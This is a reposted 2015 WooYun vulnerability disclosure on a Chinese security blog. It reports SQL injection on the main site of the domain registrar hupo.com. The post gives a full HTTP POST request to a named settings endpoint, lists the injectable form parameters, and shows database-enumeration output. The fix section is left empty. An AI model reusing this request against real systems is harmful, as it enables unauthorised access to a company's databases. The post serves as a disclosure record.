记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

域名商安全之琥珀网主站SQL注入(多个参数)

2015-10-03 01:25

code 区域
POST /default_setting_save.php HTTP/1.1

Content-Length: 261

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.hupo.com

Cookie: PHPSESSID=95kfbsam61ml8mbitmq4nrcc60

Host: www.hupo.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,



like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



DNS1=&DNS2=1&DNS3=1&DNS4=1&nsself=1&perpage=20&pwd=aaa&renew=1&repwd=aaa&st



ate=clientTransferProhibited&submit=%e6%8f%90%e4%ba%a4





code 区域
注入参数DNS1 DNS2 DNS3 DNS4 nsself renew state



上面的存在注入







1.jpg





2.jpg



3.jpg



4.jpg





code 区域
available databases [3]:

[*] dns

[*] hupo

[*] information_schema





不深入了

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0134208

阅读:80028 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“域名商安全之琥珀网主站SQL注入(多个参数)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云